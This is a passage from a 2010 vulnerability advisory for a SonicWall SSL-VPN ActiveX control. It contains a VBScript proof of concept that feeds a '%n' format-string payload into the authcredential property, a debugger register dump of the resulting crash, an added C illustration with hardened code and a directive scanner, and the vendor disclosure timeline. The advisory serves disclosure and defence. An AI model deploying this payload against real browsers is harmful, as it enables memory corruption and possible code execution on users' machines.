sub submit_onclick
    eax = string(2, unescape("%u6161"))   ' eax 61616161
    arg = "%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"
    buf = eax + arg
    obj.authcredential = buf
end sub
</script>
</body>
</html>
Notes:
======

The exploit overwrites the EAX register with 0x61616161.

EAX 61616161
ECX 000007F2
EDX 00000000
EBX FFFF006E
ESP 01929AE4
EBP 01929F54
ESI 00000020
EDI 00000002
EIP 77C1391B msvcrt.77C1391B
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD8000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty +UNORM 1C68 00000000 E162AA10
ST1 empty 7.5918347351318302720e-1715
ST2 empty +UNORM 001C 7779065D E19F4F1C
ST3 empty 3.4653990691284428800e+1178
ST4 empty 0.0000000000840901890e-4933
ST5 empty -??? FFFF 00000000 00000000
ST6 empty 6.4564231821671188480e-4932
ST7 empty 1.0000000000000000000
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

The function where the exception occurs looks like this:

77C1391B   8908   MOV DWORD PTR DS:[EAX],ECX
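The pattern behind the crash shown in the notes, as an added example that is not SonicWall's code and not part of the original advisory: a routine that hands untrusted text straight to a printf-family function (where "%x" consumes stack slots and "%n" stores the character count through the next argument slot, which is the write the faulting MOV performs), its hardened counterpart with a fixed format, and a small directive scanner that an input filter or log review can use to flag strings such as the "%1862x...%n" payload. The function names, the format_into wrapper and the sample inputs are constructed for illustration; the advisory does not say how the control formats the property internally, so the vulnerable routine is an assumed model of that, not the product's code.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hypothetical helper: forwards a format string and its arguments to
 * vsnprintf, as many logging and message-building layers do. */
static int format_into(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int written = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return written;
}

/* Assumed vulnerable pattern: the untrusted text IS the format string.
 * "%x" then reads stack slots and "%n" writes the running character count
 * through whatever pointer the next slot holds (ECX/EAX in the dump above). */
int vulnerable_format(char *out, size_t outsz, const char *untrusted)
{
    return format_into(out, outsz, untrusted);  /* BUG: untrusted is the format */
}

/* Hardened form: the format is a fixed literal and untrusted text is only
 * ever a %s argument, so directives inside it are copied, never interpreted. */
int hardened_format(char *out, size_t outsz, const char *untrusted)
{
    return snprintf(out, outsz, "%s", untrusted);
}

/* Input-validation / log-review helper: returns the number of printf
 * conversion directives in s and, via write_directives, how many are %n.
 * Flags, width, precision and length modifiers are skipped so that
 * "%1862x" and "%n" are both recognised; an escaped "%%" is not a directive. */
int count_format_directives(const char *s, int *write_directives)
{
    int directives = 0, writes = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }                     /* literal percent */
        while (*s && strchr("-+ #0", *s)) s++;                 /* flags */
        while (isdigit((unsigned char)*s) || *s == '*') s++;   /* width */
        if (*s == '.') {                                       /* precision */
            s++;
            while (isdigit((unsigned char)*s) || *s == '*') s++;
        }
        while (*s && strchr("hlLqjzt", *s)) s++;               /* length modifier */
        if (*s && strchr("diouxXeEfFgGaAcspn", *s)) {
            directives++;
            if (*s == 'n') writes++;
            s++;
        }
    }
    if (write_directives) *write_directives = writes;
    return directives;
}

/* Policy a credential-style field can enforce before the value goes anywhere
 * near a formatting routine: reject anything that would act as a directive. */
int is_safe_credential(const char *s)
{
    return count_format_directives(s, NULL) == 0;
}

int main(void)
{
    /* Constructed sample inputs (not taken from the advisory). */
    const char *benign = "alice";
    const char *hostile = "%1862x%x%x%x%n";
    char out[64];
    int writes = 0;

    printf("benign directives: %d\n", count_format_directives(benign, &writes));
    printf("hostile directives: %d (%d of them %%n)\n",
           count_format_directives(hostile, &writes), writes);
    hardened_format(out, sizeof out, hostile);
    printf("hardened copy: %s\n", out);  /* directives survive as plain text */
    return 0;
}
```

The scanner counts directives rather than just searching for "%n" because a filter that only blocks "%n" still lets "%x"/"%s" reads through; the fix that matters is the fixed-literal format in hardened_format, and the scanner is a second line of defence for inputs that cross trust boundaries.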
Solution:
=========

Version 10.0.5:
+--------------
Download the new version on

Version 10.5.1:
+--------------

SonicWall security advisory: ?kbid=8272
Disclosure timeline (yyyy/mm/dd):
=================================
2010.02.22: vulnerability found
2010.06.08: ask on full-disc for a SonicWall security contact
2010.06.09: initial contact by info () sonicwall and germany () sonicwall email address
2010.06.09: initial vendor response by phone from a German SonicWall SE
2010.06.09: got an email from SonicWall as a response to my mail to full-disc with the contact email address security () sonicwall com
2010.06.10: sent the notification and disclosure policy and ask for a PGP key
[-] no response
2010.06.18: got an email response from the SonicWall SSL-VPN product manager with a PGP key.
2010.06.19: sent PoC, advisory, disclosure policy and planned disclosure date (2010.06.24) to vendor
2010.06.19: SonicWall acknowledges the reception of the advisory
2010.06.22: vendor verifies the vulnerability
2010.07.07: ask for a status update, because the planned release date was 2010.06.24
2010.07.07: SonicWall informs me that they will release a new version at the end of July.
2010.07.07: changed release date to 2010.07.29
2010.07.29: ask for a status update, because the planned release date is 2010.07.29
2010.07.29: SonicWall informs me that the version 10.0.5 is in final QA and should be released next week.
2010.08.13: send SonicWall the information that I will release the advisory on Wednesday 2010.08.18.
2010.08.16: SonicWall informs me that the version 10.0.5 is already downloadable for customers.
2010.08.16: ask for a SonicWall advisory and a list of affected products
2010.08.17: SonicWall sends me their advisory draft
2010.08.18: ask SonicWall for credits in their advisory
2010.08.19: release of this advisory